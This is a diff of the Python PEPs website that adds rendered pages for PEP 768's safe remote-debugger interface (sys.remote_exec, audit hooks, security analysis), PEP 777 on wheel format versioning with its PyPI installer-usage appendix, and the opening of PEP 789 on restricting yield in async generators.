Rather than forcing tools to work around interpreter limitations with unsafe +code injection, we can extend CPython with a proper debugging interface that +guarantees safe execution. By adding a few thread state fields and integrating +with the interpreter’s existing evaluation loop, we can ensure debugging +operations only occur at well-defined safe points. This eliminates the +possibility of crashes and corruption while maintaining zero overhead during +normal execution.

+

The key insight is that we don’t need to inject code at arbitrary points - we +just need to signal to the interpreter that we want code executed at the next +safe opportunity. This approach works with the interpreter’s natural execution +flow rather than fighting against it.

+

After describing this idea to the PyPy development team, this proposal has +already been implemented in PyPy, +proving both its feasibility and effectiveness. Their implementation +demonstrates that we can provide safe debugging capabilities with zero runtime +overhead during normal execution. The proposed mechanism not only reduces risks +associated with current debugging approaches but also lays the foundation for +future enhancements. For instance, this framework could enable integration with +popular observability tools, providing real-time insights into interpreter +performance or memory usage. One compelling use case for this interface is +enabling pdb to attach to running Python processes, similar to how gdb allows +users to attach to a program by process ID (gdb -p <pid>). With this +feature, developers could inspect the state of a running application, evaluate +expressions, and step through code dynamically. This approach would align +Python’s debugging capabilities with those of other major programming languages +and debugging tools that support this mode.

+
+
+

Specification

+

This proposal introduces a safe debugging mechanism that allows external +processes to trigger code execution in a Python interpreter at well-defined safe +points. The key insight is that rather than injecting code directly via system +debuggers, we can leverage the interpreter’s existing evaluation loop and thread +state to coordinate debugging operations.

+

The mechanism works by having debuggers write to specific memory locations in +the target process that the interpreter then checks during its normal execution +cycle. When the interpreter detects that a debugger wants to attach, it executes the +requested operations only when it’s safe to do so - that is, when no internal +locks are held and all data structures are in a consistent state.

+
+

Runtime State Extensions

+

A new structure is added to PyThreadState to support remote debugging:

+
typedef struct _remote_debugger_support {
+    int debugger_pending_call;
+    char debugger_script[MAX_SCRIPT_SIZE];
+} _PyRemoteDebuggerSupport;
+
+
+

This structure is appended to PyThreadState, adding only a few fields that +are never accessed during normal execution. The debugger_pending_call field +indicates when a debugger has requested execution, while debugger_script +provides Python code to be executed when the interpreter reaches a safe point.

+

The value for MAX_SCRIPT_SIZE will be a trade-off between binary size and +how big debugging scripts can be. As most of the logic should be in libraries +and arbitrary code can be executed with very short amount of Python we are +proposing to start with 4kb initially. This value can be extended in the future +if we ever need to.

+
+
+

Debug Offsets Table

+

Python 3.12 introduced a debug offsets table placed at the start of the +PyRuntime structure. This section contains the _Py_DebugOffsets structure that +allows external tools to reliably find critical runtime structures regardless of +ASLR or +how Python was compiled.

+

This proposal extends the existing debug offsets table with new fields for +debugger support:

+
struct _debugger_support {
+    uint64_t eval_breaker;            // Location of the eval breaker flag
+    uint64_t remote_debugger_support; // Offset to our support structure
+    uint64_t debugger_pending_call;   // Where to write the pending flag
+    uint64_t debugger_script;         // Where to write the script path
+} debugger_support;
+
+
+

These offsets allow debuggers to locate critical debugging control structures in +the target process’s memory space. The eval_breaker and remote_debugger_support +offsets are relative to each PyThreadState, while the debugger_pending_call +and debugger_script offsets are relative to each _PyRemoteDebuggerSupport +structure, allowing the new structure and its fields to be found regardless of +where they are in memory.

+
+
+

Attachment Protocol

+

When a debugger wants to attach to a Python process, it follows these steps:

+
    +
  1. Locate PyRuntime structure in the process:
      +
    • Find Python binary (executable or libpython) in process memory (OS dependent process)
    • +
    • Extract .PyRuntime section offset from binary’s format (ELF/Mach-O/PE)
    • +
    • Calculate the actual PyRuntime address in the running process by relocating the offset to the binary’s load address
    • +
    +
  2. +
  3. Access debug offset information by reading the _Py_DebugOffsets at the start of the PyRuntime structure.
  4. +
  5. Use the offsets to locate the desired thread state
  6. +
  7. Use the offsets to locate the debugger interface fields within that thread state
  8. +
  9. Write control information:
      +
    • Write a filename containing Python code to be executed into the +debugger_script field in _PyRemoteDebuggerSupport.
    • +
    • Set debugger_pending_call flag in _PyRemoteDebuggerSupport
    • +
    • Set _PY_EVAL_PLEASE_STOP_BIT in the eval_breaker field
    • +
    +
  10. +
+

Once the interpreter reaches the next safe point, it will execute the script +provided by the debugger.

+
+
+

Interpreter Integration

+

The interpreter’s regular evaluation loop already includes a check of the +eval_breaker flag for handling signals, periodic tasks, and other interrupts. We +leverage this existing mechanism by checking for debugger pending calls only +when the eval_breaker is set, ensuring zero overhead during normal execution. +This check has no overhead. Indeed, profiling with Linux perf shows this branch +is highly predictable - the debugger_pending_call check is never taken during +normal execution, allowing modern CPUs to effectively speculate past it.

+

When a debugger has set both the eval_breaker flag and debugger_pending_call, +the interpreter will execute the provided debugging code at the next safe point. +This all happens in a completely safe context, since the interpreter is +guaranteed to be in a consistent state whenever the eval breaker is checked.

+

An audit event will be raised before the code is executed, allowing this mechanism +to be audited or disabled if desired by a system’s administrator.

+
// In ceval.c
+if (tstate->eval_breaker) {
+    if (tstate->remote_debugger_support.debugger_pending_call) {
+        tstate->remote_debugger_support.debugger_pending_call = 0;
+        const char *path = tstate->remote_debugger_support.debugger_script;
+        if (*path) {
+            if (0 != PySys_Audit("debugger_script", "%s", path)) {
+                PyErr_Clear();
+            } else {
+                FILE* f = fopen(path, "r");
+                if (!f) {
+                    PyErr_SetFromErrno(OSError);
+                } else {
+                    PyRun_AnyFile(f, path);
+                    fclose(f);
+                }
+                if (PyErr_Occurred()) {
+                    PyErr_WriteUnraisable(...);
+                }
+            }
+        }
+    }
+}
+
+
+

If the code being executed raises any Python exception it will be processed as +an unraisable exception in +the thread where the code was executed.

+
+
+

Python API

+

To support safe execution of Python code in a remote process without having to +re-implement all these steps in every tool, this proposal extends the sys module +with a new function. This function allows debuggers or external tools to execute +arbitrary Python code within the context of a specified Python process:

+
def remote_exec(pid: int, code: str, timeout: int = 0) -> None:
+    """
+    Executes a block of Python code in a given remote Python process.
+
+    Args:
+         pid (int): The process ID of the target Python process.
+         code (str): A string containing the Python code to be executed.
+         timeout (int): An optional timeout for waiting for the remote
+            process to execute the code. If the timeout is exceeded a
+            ``TimeoutError`` will be raised.
+    """
+
+
+

An example usage of the API would look like:

+
import sys
+# Execute a print statement in a remote Python process with PID 12345
+try:
+    sys.remote_exec(12345, "print('Hello from remote execution!')", timeout=3)
+except TimeoutError:
+    print(f"The remote process took too long to execute the code")
+except Exception as e:
+    print(f"Failed to execute code: {e}")
+
+
+
+
+

Configuration API

+

To allow redistributors, system administrators, or users to disable this +mechanism, several methods will be provided to control the behavior of the +interpreter:

+

A new PYTHON_DISABLE_REMOTE_DEBUG environment variable will +be provided to control the behaviour at runtime. If set to any value (including an empty string), the +interpreter will ignore any attempts to attach a debugger using this mechanism.

+

This environment variable will be added together with a new -X disable-remote-debug +flag to the Python interpreter to allow users to disable this feature at runtime.

+

Additionally a new --without-remote-debug flag will be added to the +configure script to allow redistributors to build Python without support for +remote debugging if they so desire.

+

A new flag indicating the status of remote debugging will be made available via +the debug offsets so tools can query if a remote process has disabled the +feature. This way, tools can offer a useful error message explaining why they +won’t work, instead of believing that they have attached and then never having +their script run.

+
+
+
+

Backwards Compatibility

+

This change has no impact on existing Python code or interpreter performance. +The added fields are only accessed during debugger attachment, and the checking +mechanism piggybacks on existing interpreter safe points.

+
+
+

Security Implications

+

This interface does not introduce new security concerns as it is only usable by +processes that can already write to arbitrary memory within a given process and +execute arbitrary code on the machine (in order to create the file containing +the Python code to be executed).

+

Furthermore, the execution of the code is gated by the interpreter’s +audit hooks, which can be used to monitor or prevent the execution of the code +in sensitive environments.

+

Existing operating system security mechanisms are effective for guarding +against attackers gaining arbitrary memory write access. Although the PEP +doesn’t specify how memory should be written to the target process, in practice +this will be done using standard system calls that are already being used by +other debuggers and tools. Some examples are:

+
    +
  • On Linux, the process_vm_readv() +and process_vm_writev() system calls +are used to read and write memory from another process. These operations are +controlled by ptrace access mode +checks - the same ones that govern debugger attachment. A process can only read from +or write to another process’s memory if it has the appropriate permissions (typically +requiring either root or the CAP_SYS_PTRACE +capability, though less security minded distributions may allow any process running as the same uid to attach).
  • +
  • On macOS, the interface would leverage mach_vm_read_overwrite() and +mach_vm_write() through the Mach task system. These operations require +task_for_pid() access, which is strictly controlled by the operating +system. By default, access is limited to processes running as root or those +with specific entitlements granted by Apple’s security framework.
  • +
  • On Windows, the ReadProcessMemory() +and WriteProcessMemory() functions +provide similar functionality. Access is controlled through the Windows +security model - a process needs PROCESS_VM_READ +and PROCESS_VM_WRITE +permissions, which typically require the same user context or appropriate +privileges. These are the same permissions required by debuggers, ensuring +consistent security semantics across platforms.
  • +
+

All mechanisms ensure that:

+
    +
  1. Only authorized processes can read/write memory
  2. +
  3. The same security model that governs traditional debugger attachment applies
  4. +
  5. No additional attack surface is exposed beyond what the OS already provides for debugging
  6. +
  7. Even if an attacker can write arbitrary memory, they cannot escalate this +to arbitrary code execution unless they already have filesystem access
  8. +
+

The memory operations themselves are well-established and have been used safely +for decades in tools like GDB, LLDB, and various system profilers.

+

It’s important to note that any attempt to attach to a Python process via this +mechanism would be detectable by system-level monitoring tools as well as by +Python audit hooks. This transparency provides an additional layer of +accountability, allowing administrators to audit debugging operations in +sensitive environments.

+

Further, the strict reliance on OS-level security controls ensures that existing +system policies remain effective. For enterprise environments, this means +administrators can continue to enforce debugging restrictions using standard +tools and policies without requiring additional configuration. For instance, +leveraging Linux’s ptrace_scope +or macOS’s taskgated to restrict debugger access will equally govern the +proposed interface.

+

By maintaining compatibility with existing security frameworks, this design +ensures that adopting the new interface requires no changes to established.

+
+

Security scenarios

+
    +
  • For an external attacker, the ability to write to arbitrary memory in a +process is already a severe security issue. This interface does not introduce +any new attack surface, as the attacker would already have the ability to +execute arbitrary code in the process. This interface behaves in exactly +the same way as existing debuggers, and does not introduce any new additional +security risks.
  • +
  • For an attacker who has gained arbitrary memory write access to a process but +not arbitrary code execution, this interface does not allow them to escalate. +The ability to calculate and write to specific memory locations is required, +which is not available without compromising other machine resources that +are external to the Python process.
  • +
+

Additionally, the fact that the code to be executed is gated by the interpreter’s +audit hooks means that the execution of the code can be monitored and controlled +by system administrators. This means that even if the attacker has compromised the +application and the filesystem, leveraging this interface for malicious +purposes provides a very risky proposition for an attacker, as they risk +exposing their actions to system administrators that could not only detect the +attack but also take action to prevent it.

+

Finally, is important to note that if an attacker has arbitrary memory write +access to a process and has compromised the filesystem, they can already +escalate to arbitrary code execution using other existing mechanisms, so this +interface does not introduce any new risks in this scenario.

+
+
+
+

How to Teach This

+

For tool authors, this interface becomes the standard way to implement debugger +attachment, replacing unsafe system debugger approaches. A section in the Python +Developer Guide could describe the internal workings of the mechanism, including +the debugger_support offsets and how to interact with them using system +APIs.

+

End users need not be aware of the interface, benefiting only from improved +debugging tool stability and reliability.

+
+
+

Reference Implementation

+

A reference implementation with a prototype adding remote support for pdb +can be found here.

+
+
+

Rejected Ideas

+
+

Writing Python code into the buffer

+

We have chosen to have debuggers write the code to be executed into a file +whose path is written into a buffer in the remote process. This has been deemed +more secure than writing the Python code to be executed itself into a buffer in +the remote process, because it means that an attacker who has gained arbitrary +writes in a process but not arbitrary code execution or file system +manipulation can’t escalate to arbitrary code execution through this interface.

+

This does require the attaching debugger to pay close attention to filesystem +permissions when creating the file containing the code to be executed, however. +If an attacker has the ability to overwrite the file, or to replace a symlink +in the file path to point to somewhere attacker controlled, this would allow +them to force their malicious code to be executed rather than the code the +debugger intends to run.

+
+
+
+

Thanks

+

We would like to thank CF Bolz-Tereick for their insightful comments and suggestions +when discussing this proposal.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0768.rst

+

Last modified: 2024-12-16 15:42:45 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0777/appendix-pypi-download-analysis/index.html b/pep-0777/appendix-pypi-download-analysis/index.html new file mode 100644 index 00000000000..dbecc6a5ec7 --- /dev/null +++ b/pep-0777/appendix-pypi-download-analysis/index.html @@ -0,0 +1,155 @@ + + + + + + + + Appendix: Analysis of Installer Usage on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: Analysis of Installer Usage on PyPI

+
+

Note

+

This analysis is not perfect. While it uses the best available data, +mirrors, caches used by enterprises, and other confounding factors +could affect the numbers in this analysis. Consider the numbers as trends +rather than concrete reliable figures.

+
+

One pertinent question to PEP 777 is how frequently Python users update their +installer. If users update quite frequently, compatibility concerns are not as +important; users will be up-to-date by the time new features get added. On the +other hand, if users are frequently using older installers, then incompatible +wheels on PyPI would have a much wider impact. To figure out the relative share +of up-to-date vs outdated installers, we can use PyPI download statistics.

+

PyPI publishes a BigQuery dataset, +which contains information about each download PyPI receives, including +installer name and version when available. The following query was used to +collect the data for this analysis:

+
#standardSQL
+SELECT
+  details.installer.name as installer_name,
+  details.installer.version as installer_version,
+  COUNT(*) as num_downloads,
+FROM `bigquery-public-data.pypi.file_downloads`
+WHERE
+  -- Only query the last 6 months of data
+  DATE(timestamp)
+    BETWEEN DATE_TRUNC(DATE_SUB(CURRENT_DATE(), INTERVAL 6 MONTH), MONTH)
+    AND CURRENT_DATE()
+GROUP BY `installer_name`, `installer_version`
+ORDER BY `num_downloads` DESC
+
+
+

With the raw data available, we can start investigating how up-to-date +installers that download packages from PyPI are. The below chart shows the +breakdown by installer name of all downloads on PyPI for the six month period +from March 10, 2024 to September 10, 2024.

+A pie chart breaking down PyPI downloads by installer. pip makes up 87.5%, uv makes up 4.8%, poetry makes up 3.0%, requests makes up 1.6%, and "null" makes up 2.1%. + +

As can be seen above, pip is the most popular installer in this time frame. +For simplicity’s sake, this analysis will focus on pip installations when +considering how up-to-date installers are. pip has existed for a long +time, so analyzing the version of pip used to download packages should +provide an idea of how frequently users update their installers. Below is a +chart breaking down installations in PyPI over the same six month period, now +grouped by pip installer major version. pip uses calendar versioning, so +an installation from pip 20.x means that the user has not updated their pip +in four years.

+A pie chart breaking down PyPI downloads by pip major version. 24.x makes up 47.7%, 23.x makes up 19.9%, 22.x makes up 10.5%, 21.x makes up 13.9%, 20.x makes up 5.4%, and 9.x makes up 1.9%. + +

Over two thirds of users currently run pip from this year or last. However, +about 7% are on a version that is at least four years old(!). This indicates that +there is a long tail of users who do not regularly update their installers.

+

Coming back to the initial question for PEP 777, it appears that caution should +be taken when publishing wheels with major version 2 to PyPI, as they are +likely to cause issues with a small but significant proportion of users who do +not regularly update their pip.

+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0777/index.html b/pep-0777/index.html new file mode 100644 index 00000000000..b9179a55c16 --- /dev/null +++ b/pep-0777/index.html @@ -0,0 +1,531 @@ + + + + + + + + PEP 777 – How to Re-invent the Wheel | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 777 – How to Re-invent the Wheel

+
+
Author:
+
Ethan Smith <ethan at ethanhs.me>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
09-Oct-2024
+
Post-History:
+
10-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

The current wheel 1.0 specification was written over a decade ago, +and has been extremely robust to changes in the Python packaging ecosystem. +Previous efforts to improve the wheel specification +were deferred to focus on other packaging +specifications. Meanwhile, the use of wheels has changed dramatically in the +last decade. There have been many requests for new wheel features over the +years; however, a fundamental obstacle to evolving the wheel specification has +been that there is no defined process for how to handle adding +backwards-incompatible features to wheels. Therefore, to enable other PEPs to +describe new enhancements to the wheel specification, this PEP prescribes +compatibility requirements on future wheel revisions. This PEP does not +specify a new wheel revision. The specification of a new wheel format +(“Wheel 2.0”) is left to a future PEP.

+
+
+

Rationale

+

Currently, wheel specification changes that require new installer behavior are backwards incompatible and require a major version increase in +the wheel metadata format. An increase of the wheel major version has yet to +happen, partially because such a change has the potential to be +catastrophically disruptive. Per +the wheel specification, +any installer that does not support the new major version must abort at install +time. This means that if the major version were to be incremented without +further planning, many users would see installation failures as older installers reject new wheels +uploaded to public package indices like the Python Package Index (PyPI). It is +critically important to carefully plan the interactions between build tools, +package indices, and package installers to avoid incompatibility issues, +especially considering the long tail of users who are slow to update their +installers.

+

The backward compatibility concerns have prevented valuable improvements +to the wheel file format, such as +better compression, +wheel data format improvements, +better information about what is included in a wheel, +and JSON formatted metadata in the “.dist-info” folder.

+

This PEP describes constraints and behavior for new wheel revisions to preserve +stability for existing tools that do not support a new major version of the wheel format. +This ensures that backwards incompatible changes to the wheel specification +will only affect users and tools that are properly set up to use the newer +wheels. With a clear path for evolving the wheel specification, future PEPs +will be able to improve the wheel format without needing to re-define a +completely new compatibility story.

+
+
+

Specification

+
+

Add Wheel-Version Metadata Field to Core Metadata

+

Currently, the wheel 1.0 PEP, PEP 427, specifies that wheel files +must contain a WHEEL metadata file that contains the version of the wheel +specification that the file conforms to. PEP 427 stipulates that installers +MUST warn on installation of a wheel with a minor version greater than supported, +and MUST abort on installation of wheels with a major version that is greater than +what the installer supports. This ensures that users do not get invalid +installations from wheels that installers cannot properly install.

+

However, resolvers do not currently exclude wheels with an incompatible wheel +version. There is also currently no way for a resolver to check a wheel’s +version without downloading the wheel directly. To make wheel version filtering +easy for resolvers, the wheel version MUST be included in the relevant +metadata file (currently METADATA). This will allow resolvers to +efficiently check the wheel version using the PEP 658 metadata API without +needing to download and inspect the .dist-info/WHEEL file.

+

To accomplish this, a new field, Wheel-Version, will be added to the +Core Metadata Specification. +This field is single use, and must contain the exact same version specified as +the Wheel-Version entry in the WHEEL file, or any future replacement +file defining metadata about the wheel file. If Wheel-Version is absent +from the metadata file, then tools MUST infer the wheel file major +version as 1.

+

Wheel-Version MUST NOT be included in source distribution metadata +(PKG-INFO) files. If a tool encounters Wheel-Version inside of a source +distribution metadata file, it SHOULD raise an error.

+

Wheel-Version MAY be included in the metadata file for wheels of +version 1, but for wheels of version 2 or higher, the metadata file MUST +include Wheel-Version. This enforces that future revisions of the wheel +specification can rely on resolvers skipping incompatible wheels by checking +the Wheel-Version field. Build backends are encouraged to include +Wheel-Version in all wheels that they generate, regardless of version.

+

Installers SHOULD copy the metadata file in a wheel unmodified during +installation. This prevents the need to update the RECORD file, which is +an error prone process. Tools reading installed core metadata SHOULD NOT +assume that the field is present, as other installation formats may omit it.

+

When installing a wheel, installers MUST take the following steps:

+
    +
  1. Check that the values of Wheel-Version in both the core metadata file +and wheel metadata file match. If they do not match, installers MUST +abort installation. Neither value takes precedence.
  2. +
  3. Check that the installer is compatible with Wheel-Version. If +Wheel-Version is absent, assume the version is 1.0. Warn if minor +version is greater, abort if major version is greater. This procedure is +identital to that in PEP 427.
  4. +
  5. Proceed with installation as specified in the +Binary Distribution Format +specification.
  6. +
+
+
+

Resolver Behavior Regarding Wheel-Version

+

Resolvers, in the process of selecting a wheel to install, MUST check a +candidate wheel’s Wheel-Version, and ignore incompatible wheel files. +Without ignoring these files, older installers might select a wheel that uses +an unsupported wheel version for that installer, and force the installer to +abort per PEP 427. By skipping incompatible wheel files, users will not see +installation errors when a project adopts a new wheel major version. As already +specified in PEP 427, installers MUST abort if a user tries to directly +install a wheel that is incompatible. If, in the process of resolving packages +found in multiple indices, a resolver comes across two wheels of the same +distribution and version, resolvers should prioritize the wheel of the highest +compatible version.

+

While the above protects users from unexpected breakages, users may miss a new +release of a distribution if their installer does not support the wheel version +used in the release. Imagine in the future that a package publishes 3.0 wheel +files. Downstream users won’t see that there is a new release available if +their installers only support 2.x wheels. Therefore, installers SHOULD emit +a warning if, in the process of resolving packages, they come across an incompatible wheel +and skip it.

+
+
+

First Major Version Bump Must Change File Extension

+

Unfortunately, existing resolvers do not check the compatibility of wheels +before selecting them as installation candidates. Until a majority of users +update to installers that properly check for wheel compatibility, it is unsafe +to allow publishing wheels of a new major version that existing resolvers might +select. It could take upwards of four years before the majority of users are on +updated resolvers, based on current data about PyPI installer usage (See the +Appendix: Analysis of Installer Usage on PyPI, for +details). To allow for experimentation and faster adoption of 2.0 wheels, +this PEP proposes a change to the file extension of the +wheel file format, from .whl to .whlx for all future wheel versions. +Note that x in whlx is the letter “x” and does not specify the wheel +major version. The change to extension name resolves the initial transition +issue of 2.0 wheels breaking users on existing installers that do not implement +Wheel-Version checks. By using a different file extension, 2.0 wheels can +immediately be uploaded to PyPI, and users will be able to experiment with the +new features right away. Users on older installers will simply ignore these new +files.

+

One rejected alternative would be to keep the .whl extension, but delay the +publishing of wheel 2.0 to PyPI. For more on that, please see Rejected Ideas.

+
+ +
+

Limitations on Future Wheel Revisions

+

While it is difficult to know what future features may be planned for the wheel +format, it is important that certain compatibility promises are maintained.

+

Wheel files, when installed, MUST stay compatible with the Python standard +library’s importlib.metadata for all supported CPython versions. For +example, replacing .dist-info/METADATA with a JSON formatted metadata file +MUST be a multi-major version migration with one version introducing the new +JSON file alongside the existing email header format, and another future +version removing the email header format metadata file. The version to remove +.dist-info/METADATA also MUST be adopted only after the last CPython +release that lacked support for the new file reaches end of life. This ensures +that code using importlib.metadata will not break with wheel major version +revisions.

+

Wheel files MUST remain ZIP format files as the outer container format. +Additionally, the .dist-info metadata directory MUST be placed at the +root of the archive without any compression, so that unpacking the wheel file +produces a normal .dist-info directory holding any metadata for the wheel. +Future wheel revisions MAY modify the layout, compression, and other +attributes about non-metadata components of a wheel such as data and code. This +assures that future wheel revisions remain compatible with tools operating on +package metadata, while allowing for improvements to code storage in the wheel, +such as adopting compression.

+

Package tooling MUST NOT assume that the contents and format of the wheel +file will remain the same for future wheel major versions beyond the +limitations above about metadata folder contents and outer container format. +For example, newer wheel major versions may add or remove filename components, +such as the build tag or the platform tag. Therefore it is incumbent upon +tooling to check the metadata for the Wheel-Version before attempting to +install a wheel.

+

Finally, future wheel revisions MUST NOT use any compression formats not in +the CPython standard library of at least the latest release. Wheels generated +using any new compression format should be tagged as requiring at least the +first released version of CPython to support the new compression format, +regardless of the Python API compatibility of the code within the wheel.

+
+
+
+

Backwards Compatibility

+

Backwards compatibility is an incredibly important issue for evolving the wheel +format. If adopting a new wheel revision is painful for downstream users, +package creators will hesitate to adopt the new standards, and users will be +stuck with failed CI pipelines and other installation woes.

+

Several choices in the above specification are made so that the adoption of a +new feature is less painful. For example, today wheels of an incompatible major +version are still selected by pip as installation candidates, which causes +installer failures if a project starts publishing 2.0 wheels. To avoid this +issue, this PEP requires resolvers to filter out wheels with major versions or +features incompatible with the installer.

+

This PEP also defines constraints on future wheel revisions, with the goal of +maintaining compatibility with CPython, but allowing evolution of wheel +contents. Wheel revisions shouldn’t cause package installations to break on +older CPython revisions, as not only would it be frustrating, it would be +incredibly hard to debug for users.

+

This PEP relies on resolvers being able to efficiently acquire package +metadata, usually through PEP 658. This might present a problem for users of +package indices that do not serve PEP 658 metadata. However, today most +installers fall back on using HTTP range requests to efficiently acquire only +the part of a wheel needed to read the metadata, a feature most storage +providers and servers include. Furthermore, future improvements to wheels +such as compression will make up performance losses due to inspecting files +in the wheel.

+

The main compatibility limitation of this PEP is for projects that start +publishing solely new wheels alongside a source distribution. If a user on an +older installer tries to install the package, it will fall back to the source +distribution, because the resolver will skip all newer wheels. Users are often +poorly set up to build projects from source, so this could lead to some failed +builds users would not see otherwise. There are several approaches to resolving +this issue, such as allowing dual-publishing for the initial migration, or +marking source distributions as not intended to be built.

+
+
+

Rejected Ideas

+
+

The Wheel Format is Perfect and Does not Need to be Changed

+

The wheel format has been around for over 10 years, and in that time, Python +packages have changed a lot. It is much more common for packages to include +Rust or C extension modules, increasing the size of packages. Better +compression, such as lzma or zstd, could save a lot of time and bandwidth for +PyPI and its users. Compatibility tags cannot express the wide variety of +hardware used to accelerate Python code today, nor encode shared library +compatibility information. In order to address these issues, evolution of the +wheel package format is necessary.

+
+
+

Wheel Format Changes Should be Tied to CPython Releases

+

I do not believe that tying wheel revisions to CPython +releases is beneficial. The main benefit of doing so is to make adoption of new +wheels predictable - users with the latest CPython get the latest package +format! This choice has several issues however. First, tying the new format +to the latest CPython makes adoption much slower. Users on LTS versions of +Linux with older Python installations are free to update their pip in a virtual +environment, but cannot update the version of Python as easily. While some +changes to the wheel format must be tied to CPython changes necessarily, such +as adding new compression formats or changing the metadata format, many changes +do not need to be tied to the Python version, such as symlinks, enhanced +compatibility tags, and new formats that use existing compression formats in +the standard library. Additionally, wheels are used across multiple different +language implementations, which lag behind the CPython version. It seems unfair +to prevent their users from using a feature due to the Python version. Lastly, +while this PEP does not suggest tying the wheel version to CPython releases, a +future PEP may still do so at any time, so this choice does not need to be made +in this PEP.

+
+
+

Keep Using .whl as the File Extension

+

While keeping the extension .whl is appealing for many reasons, it presents +several problems that are difficult to surmount. First, current installers +would still pick a new wheel and fail to install the package. Furthermore, +the file name of a wheel would not be able to change without breaking existing +installers that expect a set wheel file name format. While the current filename +specification for wheels is sufficient for current usage, the optional +build tag in the middle of the file name makes any extensions ambiguous (i.e. +foo-0.3-py3-none-any-fancy_new_tag.whl would parse as the build tag being +py3). This limits changes to information stored in the wheel file name.

+
+
+

Store the Wheel Major Version in the File Extension (.whl2)

+

Storing the wheel major version in the file extension has several nice +advantages. For one, there is no need to introduce the Wheel-Version +metadata field, since installers could simply filter based on file extension. +This would also allow future side-by-side packages. However, changing the +extension for wheels each major version has some downsides. First, the version +stored in the WHEEL file must match the file extension, and this would need +to be verified by installers. Additionally, many systems associate file type by +file extension (e.g. executable associations, various web caching software), +and these would need to be updated every version that is released. Furthermore, +part of the brittleness of the current wheel specification is that so much +metadata is stored in the filename. Filenames are not well suited to store +structured data. Moving away from encoding information in the filename should +be a goal of future wheel revisions.

+

Another possibility is to use the file extension to encode the outer container +format (i.e. a ZIP file containing .dist-info) separate from the inner +wheel version. However, this could lead to confusion if the file extension and +inner Wheel-Version diverge. If an installer raises an error due to an +incompatible wheel 3.0 as obtained from the wheel metadata, some users will +be confused by the difference from the file extension .whl2.

+
+
+

Wheel 2.0 Should Change the Outer Container Format

+

Since wheel 2.0 will change the extension of wheel files, it is the best +opportunity to modify the outer container format. Compatibility does not need +to be kept with a different file extension that tools will need to opt-in to +reading. The main use-case for a different exterior compression format would +be better compression. For example, the outer container could be changed into +a Zstandard tarfile, .tar.zst, which +would decompress faster and produce smaller wheels. However, there are several +practical issues with this. First, Zstandard is not part of the Python standard +library, so pure-Python packaging tools would need to ship an extension to +unpack these wheels. This could cause some compatibility issues for several +platforms where extension modules are not easy to install. Furthermore, a +future wheel revision could always introduce a new layout of non-metadata files +that uses a .tar.zst inside the existing ZIP-based format.

+

Finally, it is not a good idea to change the wheel file format too much at +once. The goal of this PEP is to make evolving the specification easier, and +part of the rationale behind making wheel evolution easier is to avoid “all +at once” changes. Changing the outer file format for wheels would require +re-writing how package metadata is not only discovered, but also installed.

+
+
+

Why not Specify Wheel 2.0 In This PEP?

+

There are many features that could be included as part of wheel 2.0, but this +PEP does not cover them. The goal of this PEP is to define a compatibility +story for the wheel file format. Changes that do not pertain to compatibility +for wheel versions do not need to be in this PEP, and should be introducted +in follow-up PEPs defining new wheel features.

+
+
+
+

Discussion Topics

+
+

Should Indices Support Dual-publishing for the First Migration?

+

Since .whl and .whlx will look different in file name, they could be +uploaded side-by-side to package indices like PyPI. This has some nice +benefits, like dual-support for older and newer installers, so users who can +get the latest features, while users who don’t upgrade still can install the +latest version of a package.

+

There are many complications however. Should we allow wheel 2 uploads to +existing wheel 1-only releases? Should we put any requirements on the +side-by-side wheels, such as:

+
+

Constraints on dual-published wheels

+

A given index may contain identical-content wheels with different wheel +versions, and installers should prefer the newest-available wheel format, +with all other factors held constant.

+
+

Should we only allow uploading both with PEP 694 allowing “atomic” +dual-publishing?

+
+
+
+

Acknowledgements

+

The author of this PEP is greatly indebted to the incredibly valuable review, +advice, and feedback of Barry Warsaw and Michael Sarahan.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0777.rst

+

Last modified: 2024-10-15 22:48:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0789/index.html b/pep-0789/index.html new file mode 100644 index 00000000000..a09fda1a503 --- /dev/null +++ b/pep-0789/index.html @@ -0,0 +1,753 @@ + + + + + + + + PEP 789 – Preventing task-cancellation bugs by limiting yield in async generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 789 – Preventing task-cancellation bugs by limiting yield in async generators

+
+
Author:
+
Zac Hatfield-Dodds <zac at zhd.dev>, +Nathaniel J. Smith <njs at pobox.com>
+
PEP-Delegate:
+

+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
14-May-2024
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

Structured concurrency is increasingly popular in Python. Interfaces such as +the asyncio.TaskGroup and asyncio.timeout context managers support +compositional reasoning, and allow developers to clearly scope the lifetimes of +concurrent tasks. However, using yield to suspend a frame inside such a +context leads to situations where the wrong task is canceled, timeouts are +ignored, and exceptions are mishandled. More fundamentally, suspending a frame +inside a TaskGroup violates the structured concurrency design principle that +child tasks are encapsulated within their parent frame.

+

To address these issues, this PEP proposes a new sys.prevent_yields() context +manager. When syntactically inside this context, attempting to yield will +raise a RuntimeError, preventing the task from yielding. Additionally, a +mechanism will be provided for decorators such as @contextmanager to allow +yields inside the decorated function. sys.prevent_yields() will be used by +asyncio and downstream libraries to implement task groups, timeouts, and +cancellation; and a related mechanism by contextlib etc. to convert +generators into context managers which allow safe yields.

+
+
+

Background

+

